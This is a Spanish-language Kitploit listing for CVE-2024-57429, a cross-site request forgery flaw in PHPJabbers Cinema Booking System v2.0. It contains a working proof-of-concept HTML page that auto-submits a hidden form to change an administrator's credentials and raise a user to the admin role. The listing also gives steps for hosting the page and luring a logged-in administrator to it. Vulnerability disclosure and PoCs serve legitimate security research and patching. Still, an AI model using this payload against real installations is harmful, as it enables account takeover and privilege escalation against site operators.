Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-57429 — CVE-2024-57429: PHPJabbers Cinema Booking System v2.0 es vulnerable a CSRF, lo que permite a los atacantes escalar privilegios falsificando solicitudes en nombre de un administrador. | Kitploit
Herramientas/GitHubGitHub/ahrixia/cve-2024-57429
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubahrixia/cve-2024-57429

CVE-2024-57429

CVE-2024-57429: PHPJabbers Cinema Booking System v2.0 es vulnerable a CSRF, lo que permite a los atacantes escalar privilegios falsificando solicitudes en nombre de un administrador.

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-57429

Una vulnerabilidad de falsificación de solicitudes entre sitios (CSRF) en la función pjActionUpdate de PHPJabbers Cinema Booking System v2.0 permite a atacantes remotos escalar privilegios engañando a un administrador autenticado para que envíe una solicitud no autorizada.

Impacto:

La explotación de esta vulnerabilidad CSRF puede conllevar acciones no autorizadas, como:

  • Cambiar la contraseña del administrador, bloqueándolo efectivamente.
  • Elevar los privilegios del atacante a administrador mediante la actualización de su rol de usuario.

Exploit - Prueba de Concepto (POC)

Falsificación de Solicitudes entre Sitios (CSRF)

poc.html

root@kitploit:~
<html>
 <!-- CSRF PoC - Update Admin User -->
 <body>
   <form action="http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionUpdate" method="POST">
     <input type="hidden" name="user_update" value="1" />
     <input type="hidden" name="id" value="3" />
     <input type="hidden" name="role_id" value="1" />
     <input type="hidden" name="email" value="[email protected]" />
     <input type="hidden" name="password" value="newpassword123" />
     <input type="hidden" name="name" value="Attacker" />
     <input type="hidden" name="phone" value="1234567890" />
     <input type="hidden" name="status" value="T" />
     <input type="submit" value="Submit request" />
   </form>
   <script>
     history.pushState('', '', '/');
     document.forms[0].submit();
   </script>
 </body>
</html>
  1. Guarda el código anterior como poc.html
  2. Aloja el archivo en un servidor y engaña al administrador para que acceda a él mientras está conectado a la aplicación.
  3. La cuenta del administrador se actualizará con los detalles del atacante y la nueva contraseña.
Descargar herramienta